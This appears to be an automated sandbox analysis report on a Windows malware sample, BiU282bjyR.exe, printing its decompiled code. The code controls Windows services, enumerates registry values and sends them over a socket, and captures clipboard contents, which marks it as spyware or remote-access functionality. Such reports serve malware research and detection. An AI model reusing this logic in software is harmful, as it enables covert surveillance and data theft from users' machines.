                    0x00447c54
                    0x00000000
                    0x00447c54
                    0x00447c3b
                    0x00447c3b
                    0x00447c3c
                    0x00447c3c
                    0x00447c41
                    0x00447c7c
                    0x00447c7d
                    0x00447c83
                    0x00447c88
                    0x00447c8b
                    0x00447c8c
                    0x00447c8d
                    0x00447c94
                    0x00447c96
                    0x00447c98
                    0x00447c9d
                    0x00447ca0
                    0x00447cae
                    0x00447cba
                    0x00447cbd
                    0x00447cc0
                    0x00447cd2
                    0x00447cd7
                    0x00447cd9
                    0x00447ce4
                    0x00447cea
                    0x00447cf2
                    0x00447cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447cdb
                    0x00447cdb
                    0x00000000
                    0x00447cdb
                    0x00447cc2
                    0x00447cc2
                    0x00447cc3
                    0x00447cc3
                    0x00447cf6
                    0x00447cf7
                    0x00447cf7
                    0x00447ca2
                    0x00447ca8
                    0x00447cac
                    0x00447cff
                    0x00447d00
                    0x00447d06
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447cac
                    0x00447d0d
                    0x00447d0d
                    0x00447c1b
                    0x00447c21
                    0x00447c25
                    0x00447c70
                    0x00447c71
                    0x00447c7b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00447c25

                    APIs
                    • GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                    • _free.LIBCMT ref: 00447C3C
                    • _free.LIBCMT ref: 00447C64
                    • SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C71
                    • SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                    • _abort.LIBCMT ref: 00447C83
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 799a254b124cdac433ee041639fbe8a0ee6aa68eb61f2a42432cd695f728cbc6
                    • Instruction ID: 45099a13354affed31290544cc1151b4d0282077c9d9941177bc141680a5a3d8
                    • Opcode Fuzzy Hash: 799a254b124cdac433ee041639fbe8a0ee6aa68eb61f2a42432cd695f728cbc6
                    • Instruction Fuzzy Hash: D7F0A931148B0167F62133756D4AF6F26298BC2726F25052FF519B22D3DF2DC847815D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A53B(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t20 = OpenSCManagerW(0, 0, 0x20);
                    				_t19 = OpenServiceW(_t20, E00401F04( &_a4), 0x20);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401F09();
                    				return _t16;
                    			}







                    0x0041a546
                    0x0041a555
                    0x0041a564
                    0x0041a568
                    0x0041a589
                    0x0041a58c
                    0x0041a58f
                    0x0041a56a
                    0x0041a56b
                    0x0041a56b
                    0x0041a594
                    0x0041a5a1

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A0B8,00000000), ref: 0041A54A
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A0B8,00000000), ref: 0041A55E
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A0B8,00000000), ref: 0041A56B
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A0B8,00000000), ref: 0041A57A
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A0B8,00000000), ref: 0041A58C
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A0B8,00000000), ref: 0041A58F
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: b5a8a1f1aebcbcaa697b049b81cd3bc789b1bf3459e3b095dfb87457e7057199
                    • Instruction ID: b028b2db99e22c2d6ed3af3ab186669068776bf8cf66fe94dc0297c1b19d228b
                    • Opcode Fuzzy Hash: b5a8a1f1aebcbcaa697b049b81cd3bc789b1bf3459e3b095dfb87457e7057199
                    • Instruction Fuzzy Hash: DCF0C2315013187BD611AF65AC4AEBF3B6CDB45B62F01002AFA09A2192DF78CD4985A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A63F(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t20 = OpenSCManagerW(0, 0, 0x40);
                    				_t19 = OpenServiceW(_t20, E00401F04( &_a4), 0x40);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401F09();
                    				return _t16;
                    			}







                    0x0041a64a
                    0x0041a659
                    0x0041a668
                    0x0041a66c
                    0x0041a68d
                    0x0041a690
                    0x0041a693
                    0x0041a66e
                    0x0041a66f
                    0x0041a66f
                    0x0041a698
                    0x0041a6a5

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A038,00000000), ref: 0041A64E
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A038,00000000), ref: 0041A662
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A038,00000000), ref: 0041A66F
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A038,00000000), ref: 0041A67E
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A038,00000000), ref: 0041A690
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A038,00000000), ref: 0041A693
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 153c79d8a9faeaf45f58d3ff94e0a5d111b980be252146941341dba9aa8202bd
                    • Instruction ID: 31121cc431c49e7ff2b574b3135e1b8f016b1aba1fae59b3abaef0e7c9ddbbbb
                    • Opcode Fuzzy Hash: 153c79d8a9faeaf45f58d3ff94e0a5d111b980be252146941341dba9aa8202bd
                    • Instruction Fuzzy Hash: 2FF022315012186FD211AB249C4AEBF3B6CDB40B62F01002AFA09A2182DF38CD0985A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A6A6(char _a4) {
                    				struct _SERVICE_STATUS _v32;
                    				signed int _t16;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t16 = 0;
                    				_t20 = OpenSCManagerW(0, 0, 0x40);
                    				_t19 = OpenServiceW(_t20, E00401F04( &_a4), 0x40);
                    				if(_t19 != 0) {
                    					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                    					CloseServiceHandle(_t20);
                    					CloseServiceHandle(_t19);
                    				} else {
                    					CloseServiceHandle(_t20);
                    				}
                    				E00401F09();
                    				return _t16;
                    			}







                    0x0041a6b1
                    0x0041a6c0
                    0x0041a6cf
                    0x0041a6d3
                    0x0041a6f4
                    0x0041a6f7
                    0x0041a6fa
                    0x0041a6d5
                    0x0041a6d6
                    0x0041a6d6
                    0x0041a6ff
                    0x0041a70c

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00419FB8,00000000), ref: 0041A6B5
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419FB8,00000000), ref: 0041A6C9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419FB8,00000000), ref: 0041A6D6
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419FB8,00000000), ref: 0041A6E5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419FB8,00000000), ref: 0041A6F7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419FB8,00000000), ref: 0041A6FA
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: fc77140ca2c1ca42dd4efe8eeffecf8ebcb0961faa0dbb2dba8e7baff4a9256a
                    • Instruction ID: 24cdee84ce6ec419a1d92c4e282281f3d81b74e41f1fe7fd1026cf647d3d4d2a
                    • Opcode Fuzzy Hash: fc77140ca2c1ca42dd4efe8eeffecf8ebcb0961faa0dbb2dba8e7baff4a9256a
                    • Instruction Fuzzy Hash: D6F0F6715412187BD3116F25AC49EBF3B6CDB45BA2F01002EFE09A2192EF78CD4A95F9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00413603(void* __ecx, short* __edx) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				int _v24;
                    				int _v28;
                    				int _v32;
                    				char _v56;
                    				int _v60;
                    				int _v64;
                    				int _v68;
                    				int _v72;
                    				int _v76;
                    				struct _FILETIME _v84;
                    				void* _v95;
                    				char _v96;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				short _v668;
                    				short _v1188;
                    				char _v11188;
                    				short _v43956;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				int _t72;
                    				long _t73;
                    				void* _t93;
                    				long _t103;
                    				void* _t104;
                    				void* _t110;
                    				void* _t140;
                    				int _t144;
                    				int _t146;
                    				void* _t147;
                    				void* _t148;
                    				void* _t149;
                    
                    				_t137 = __edx;
                    				_t112 = __ecx;
                    				E004570C0();
                    				_push(_t140);
                    				_t144 = 0;
                    				_t110 = __ecx;
                    				E004368A0(_t140,  &_v1188, 0, 0x208);
                    				_t149 = _t148 + 0xc;
                    				_v24 = 0x104;
                    				_v8 = 0;
                    				_v12 = 0x3fff;
                    				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                    				_t72 = _v8;
                    				if(_t72 != 0 && _t72 != 0) {
                    					do {
                    						_v28 = 0xff;
                    						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                    						_t152 = _t103;
                    						if(_t103 == 0) {
                    							_t104 = E0040417E(_t110,  &_v56, _t137, _t147, "\n");
                    							_t137 =  &_v668;
                    							E0040325D(E004042FC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
                    							E00401F09();
                    							_t112 =  &_v56;
                    							E00401F09();
                    						}
                    						_t144 = _t144 + 1;
                    					} while (_t144 < _v8);
                    				}
                    				_t73 = _v20;
                    				if(_t73 != 0) {
                    					_t146 = 0;
                    					if(_t73 != 0) {
                    						do {
                    							_v96 = 0;
                    							_v16 = 0x2710;
                    							asm("stosd");
                    							_v12 = 0x3fff;
                    							asm("stosd");
                    							asm("stosw");
                    							asm("stosb");
                    							_v43956 = 0;
                    							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                    							_t156 = _t73;
                    							if(_t73 == 0) {
                    								E00441861(_t112, _v32,  &_v96, 0xa);
                    								_t149 = _t149 + 0xc;
                    								E0040325D(E004042FC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040417E(_t110,  &_v132, _t137, _t147, "\n")));
                    								E00401F09();
                    								E00401F09();
                    								L00403376(E004052FD(_t110,  &_v132,  &_v96, _t147, _t156, E00402093(_t110,  &_v56,  &_v43956, _t147, "\n")));
                    								E00401FD8();
                    								E00401FD8();
                    								_t93 = E00402093(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
                    								_t137 = E004020B7(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
                    								L00403376(E00402EA1( &_v132, _t95, _t93));
                    								E00401FD8();
                    								E00401FD8();
                    								_t112 =  &_v156;
                    								_t73 = E00401FD8();
                    							}
                    							_t146 = _t146 + 1;
                    						} while (_t146 < _v20);
                    					}
                    				}
                    				return _t73;
                    			}









































                    0x00413603
                    0x00413603
                    0x0041360b
                    0x00413612
                    0x00413618
                    0x00413622
                    0x00413624
                    0x00413629
                    0x0041362c
                    0x00413636
                    0x00413639
                    0x0041366a
                    0x00413670
                    0x00413675
                    0x0041367b
                    0x0041367e
                    0x00413699
                    0x0041369f
                    0x004136a1
                    0x004136ab
                    0x004136b1
                    0x004136c6
                    0x004136ce
                    0x004136d3
                    0x004136d6
                    0x004136d6
                    0x004136db
                    0x004136dc
                    0x0041367b
                    0x004136e1
                    0x004136e6
                    0x004136ec
                    0x004136f0
                    0x004136f6
                    0x004136f8
                    0x004136ff
                    0x00413706
                    0x00413707
                    0x0041370e
                    0x0041370f
                    0x00413711
                    0x00413714
                    0x00413739
                    0x0041373f
                    0x00413741
                    0x00413750
                    0x00413755
                    0x0041377b
                    0x00413783
                    0x0041378b
                    0x004137b0
                    0x004137b8
                    0x004137c0
                    0x004137d0
                    0x004137e8
                    0x004137f9
                    0x00413801
                    0x00413809
                    0x0041380e
                    0x00413814
                    0x00413814
                    0x00413819
                    0x0041381a
                    0x004136f6
                    0x004136f0
                    0x00413829

                    APIs
                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0041366A
                    • RegEnumKeyExW.ADVAPI32 ref: 00413699
                    • RegEnumValueW.ADVAPI32 ref: 00413739
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Enum$InfoQueryValue
                    • String ID: [regsplt]$`EG
                    • API String ID: 3554306468-1083663566
                    • Opcode ID: fcd36b27a555c188d84e5fa4c1c9074f56f35355e5ff6d736fa21e81f18dfbfb
                    • Instruction ID: 07c7349a1cca9852414a85ff28baff2d72cd44790f447ab96ea220ffd02e9be2
                    • Opcode Fuzzy Hash: fcd36b27a555c188d84e5fa4c1c9074f56f35355e5ff6d736fa21e81f18dfbfb
                    • Instruction Fuzzy Hash: 06513C71900219AADB11EB95DC96EEFB7BDAF04308F10407AF505F2191EF786B48CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004138BB(short* __ecx, char __edx, void* __eflags, char _a4) {
                    				void* _v16;
                    				char _v28;
                    				char _v52;
                    				void* _v56;
                    				char _v76;
                    				void* _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v124;
                    				void* _v128;
                    				char _v148;
                    				void* _v152;
                    				char _v172;
                    				void* _v176;
                    				char _v196;
                    				void* _v200;
                    				char _v220;
                    				void* _v224;
                    				char _v225;
                    				void* _v228;
                    				void* _v248;
                    				void* _v268;
                    				void* __ebx;
                    				void* __ebp;
                    				void* _t28;
                    				void* _t35;
                    				void* _t36;
                    				void* _t61;
                    				short* _t116;
                    				void* _t120;
                    				void* _t123;
                    				void* _t124;
                    
                    				_t103 = __edx;
                    				_t123 =  &_v228 - 0x18;
                    				_v225 = __edx;
                    				_t116 = __ecx;
                    				E004020F6(_t61, _t123, __edx, __eflags,  &_a4);
                    				_t28 = E0041382A(_t61, __eflags);
                    				_t124 = _t123 + 0x18;
                    				_t62 = 0;
                    				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
                    					E00402093(0, _t124 - 0x18, _t103, _t120, "3");
                    					_push(0x72);
                    					E00404AA1(0x4744e0, _t103, __eflags);
                    				} else {
                    					E00413603(_v224, _t103);
                    					_t35 = E0041B7B3(0,  &_v28, 0x4744b0);
                    					_t36 = E0041B7B3(0x474498,  &_v52, 0x474498);
                    					_t129 = _v225;
                    					_t107 =  ==  ? "0" : "1";
                    					_t114 = E00402F10(0x474498,  &_v220, E00402F10(0x474498,  &_v196, E00402F10(0x474498,  &_v172, E00402EA1( &_v148, E00402F10(0x474498,  &_v124, E00402EA1( &_v100, E0040531E( &_v76,  ==  ? "0" : "1", 0x4744b0, 0x473ec8), _t36), 0x4744b0, _v225, 0x473ec8), _t35), 0x4744b0, _v225, 0x473ec8), 0x4744b0, _v225, 0x4744c8), 0x4744b0, _t129, 0x473ec8);
                    					E00402F10(0x474498, _t124 - 0x18, _t44, 0x4744b0, _t129, 0x474560);
                    					_push(0x71);
                    					E00404AA1(0x4744e0, _t44, _t129);
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					L00408F7E(0x474498, 0x4744b0, _t44, 0x46b928);
                    					L00408F7E(0x474498, 0x474498, _t114, 0x46b928);
                    					L00405AA6(0x474498, 0x4744c8, _t114, 0x465094);
                    					L00405AA6(0x474498, 0x474560, _t114, 0x465094);
                    					RegCloseKey(_v268);
                    					_t62 = 1;
                    				}
                    				E00401FD8();
                    				return _t62;
                    			}



































                    0x004138bb
                    0x004138c5
                    0x004138c8
                    0x004138cc
                    0x004138d8
                    0x004138dd
                    0x004138e2
                    0x004138e9
                    0x004138fc
                    0x00413a76
                    0x00413a7b
                    0x00413a82
                    0x00413902
                    0x00413906
                    0x0041392f
                    0x00413944
                    0x00413949
                    0x00413961
                    0x004139bb
                    0x004139bf
                    0x004139c5
                    0x004139cc
                    0x004139d5
                    0x004139de
                    0x004139e7
                    0x004139f0
                    0x004139f9
                    0x00413a05
                    0x00413a11
                    0x00413a1d
                    0x00413a29
                    0x00413a36
                    0x00413a3e
                    0x00413a4e
                    0x00413a59
                    0x00413a62
                    0x00413a68
                    0x00413a68
                    0x00413a8e
                    0x00413a9f

                    APIs
                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 004138F4
                      • Part of subcall function 00413603: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0041366A
                      • Part of subcall function 00413603: RegEnumKeyExW.ADVAPI32 ref: 00413699
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • RegCloseKey.ADVAPI32(00000000,00465094,00465094,0046B928,0046B928,00000071), ref: 00413A62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumInfoOpenQuerysend
                    • String ID: `EG$DG$DG
                    • API String ID: 3114080316-400422272
                    • Opcode ID: 9a75a3393cd1cc532cf18dc1ae16849e574f430c907ef6446ddc6b9b3de14c02
                    • Instruction ID: 7c89270c69aec7345fd0858f9e62861747d72e9630901e2d332110219139d092
                    • Opcode Fuzzy Hash: 9a75a3393cd1cc532cf18dc1ae16849e574f430c907ef6446ddc6b9b3de14c02
                    • Instruction Fuzzy Hash: B541C0316082005BC324FA26DD52AEF73959FD1388F40883FF54A631D2EF7C594A86AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E00442E15(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				void* _v12;
                    				char _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t36;
                    				struct HINSTANCE__* _t37;
                    				struct HINSTANCE__* _t43;
                    				intOrPtr* _t44;
                    				intOrPtr* _t45;
                    				CHAR* _t49;
                    				struct HINSTANCE__* _t50;
                    				void* _t52;
                    				struct HINSTANCE__* _t55;
                    				intOrPtr* _t59;
                    				struct HINSTANCE__* _t64;
                    				intOrPtr _t65;
                    
                    				_t52 = __ecx;
                    				if(_a4 == 2 || _a4 == 1) {
                    					E0044EA69(_t52);
                    					GetModuleFileNameA(0, 0x4713d8, 0x104);
                    					_t49 =  *0x471a50; // 0x7a33e8
                    					 *0x471a58 = 0x4713d8;
                    					if(_t49 == 0 ||  *_t49 == 0) {
                    						_t49 = 0x4713d8;
                    					}
                    					_v8 = 0;
                    					_v16 = 0;
                    					E00442F39(_t52, _t49, 0, 0,  &_v8,  &_v16);
                    					_t64 = E004430AE(_v8, _v16, 1);
                    					if(_t64 != 0) {
                    						E00442F39(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                    						if(_a4 != 1) {
                    							_v12 = 0;
                    							_push( &_v12);
                    							_t50 = E0044E584(_t49, 0, _t64, _t64);
                    							if(_t50 == 0) {
                    								_t59 = _v12;
                    								_t55 = 0;
                    								_t36 = _t59;
                    								if( *_t59 == 0) {
                    									L15:
                    									_t37 = 0;
                    									 *0x471a44 = _t55;
                    									_v12 = 0;
                    									_t50 = 0;
                    									 *0x471a48 = _t59;
                    									L16:
                    									E00446172(_t37);
                    									_v12 = 0;
                    									goto L17;
                    								} else {
                    									goto L14;
                    								}
                    								do {
                    									L14:
                    									_t36 = _t36 + 4;
                    									_t55 =  &(_t55->i);
                    								} while ( *_t36 != 0);
                    								goto L15;
                    							}
                    							_t37 = _v12;
                    							goto L16;
                    						}
                    						 *0x471a44 = _v8 - 1;
                    						_t43 = _t64;
                    						_t64 = 0;
                    						 *0x471a48 = _t43;
                    						goto L10;
                    					} else {
                    						_t44 = E0043FFBD();
                    						_push(0xc);
                    						_pop(0);
                    						 *_t44 = 0;
                    						L10:
                    						_t50 = 0;
                    						L17:
                    						E00446172(_t64);
                    						return _t50;
                    					}
                    				} else {
                    					_t45 = E0043FFBD();
                    					_t65 = 0x16;
                    					 *_t45 = _t65;
                    					E0043B6B0();
                    					return _t65;
                    				}
                    			}





















                    0x00442e15
                    0x00442e22
                    0x00442e42
                    0x00442e55
                    0x00442e5b
                    0x00442e61
                    0x00442e69
                    0x00442e70
                    0x00442e70
                    0x00442e75
                    0x00442e7c
                    0x00442e83
                    0x00442e95
                    0x00442e9c
                    0x00442ebb
                    0x00442ec7
                    0x00442ee2
                    0x00442ee5
                    0x00442eec
                    0x00442ef2
                    0x00442ef9
                    0x00442efc
                    0x00442efe
                    0x00442f02
                    0x00442f0c
                    0x00442f0c
                    0x00442f0e
                    0x00442f14
                    0x00442f17
                    0x00442f19
                    0x00442f1f
                    0x00442f20
                    0x00442f26
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00442f04
                    0x00442f04
                    0x00442f04
                    0x00442f07
                    0x00442f08
                    0x00000000
                    0x00442f04
                    0x00442ef4
                    0x00000000
                    0x00442ef4
                    0x00442ecd
                    0x00442ed2
                    0x00442ed4
                    0x00442ed6
                    0x00000000
                    0x00442e9e
                    0x00442e9e
                    0x00442ea3
                    0x00442ea5
                    0x00442ea6
                    0x00442edb
                    0x00442edb
                    0x00442f29
                    0x00442f2a
                    0x00000000
                    0x00442f33
                    0x00442e2a
                    0x00442e2a
                    0x00442e31
                    0x00442e32
                    0x00442e34
                    0x00000000
                    0x00442e39

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BiU282bjyR.exe,00000104), ref: 00442E55
                    • _free.LIBCMT ref: 00442F20
                    • _free.LIBCMT ref: 00442F2A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Users\user\Desktop\BiU282bjyR.exe$3z
                    • API String ID: 2506810119-3937084784
                    • Opcode ID: 1d71717d2b24481a9a4295fa2770da9c1c0745f909ddf91c55033cef0d9853e7
                    • Instruction ID: ad4532ccb81e1ed098bfc20889ca46910e28b15f8a4633190fc406b4fbb57f16
                    • Opcode Fuzzy Hash: 1d71717d2b24481a9a4295fa2770da9c1c0745f909ddf91c55033cef0d9853e7
                    • Instruction Fuzzy Hash: B731C471A00208AFEB21DF9AD98199FBBF8EB85314F60406BF90497311D7B48E44DB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E0040B5BD(void* __ecx) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t23;
                    				void* _t27;
                    				void* _t30;
                    				void* _t78;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    
                    				_t86 = _t85 - 0x94;
                    				_t78 = __ecx;
                    				if( *0x475ce4 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                    					E00433E04(0x475ce4);
                    					_t89 =  *0x475ce4 - 0xffffffff;
                    					if( *0x475ce4 == 0xffffffff) {
                    						E00401F86(0x475ce8, 0x475ce8);
                    						E0043418E(_t89, E004579FA);
                    						E00433DC5(0x475ce4, 0x475ce4);
                    					}
                    				}
                    				E0040B583( &_v28);
                    				_t23 = E0040B841(0x475ce8);
                    				_t90 = _t23;
                    				if(_t23 == 0) {
                    					E0040B761(0x475ce8,  &_v28);
                    					_t27 = E004076DE(_t90);
                    					_t91 = _t27;
                    					if(_t27 != 0) {
                    						E00402093(0x475ce8,  &_v76, 0x46b928, _t84, "\r\n[End of clipboard]\r\n");
                    						E00402093(0x475ce8,  &_v52, 0x46b928, _t84, "\r\n[Text copied to clipboard]\r\n");
                    						_t30 = E0041B6F3( &_v148,  &_v76);
                    						E00402FA5(_t86 - 0x18, E0040431D(0x475ce8,  &_v100, E0041B6F3( &_v124,  &_v52), _t84, _t91, 0x475ce8), _t30);
                    						E0040A4AB(_t78);
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						E00401FD8();
                    						E00401FD8();
                    					}
                    				}
                    				return E00401F09();
                    			}



















                    0x0040b5c6
                    0x0040b5db
                    0x0040b5e3
                    0x0040b5eb
                    0x0040b5f0
                    0x0040b5f8
                    0x0040b5fc
                    0x0040b606
                    0x0040b60c
                    0x0040b612
                    0x0040b5f8
                    0x0040b617
                    0x0040b621
                    0x0040b626
                    0x0040b628
                    0x0040b634
                    0x0040b641
                    0x0040b646
                    0x0040b648
                    0x0040b656
                    0x0040b663
                    0x0040b671
                    0x0040b697
                    0x0040b69f
                    0x0040b6a7
                    0x0040b6af
                    0x0040b6ba
                    0x0040b6c2
                    0x0040b6ca
                    0x0040b6ca
                    0x0040b648
                    0x0040b6dd

                    APIs
                      • Part of subcall function 0043418E: __onexit.LIBCMT ref: 00434194
                    • __Init_thread_footer.LIBCMT ref: 0040B60C
                    Strings
                    Memory Dump Source
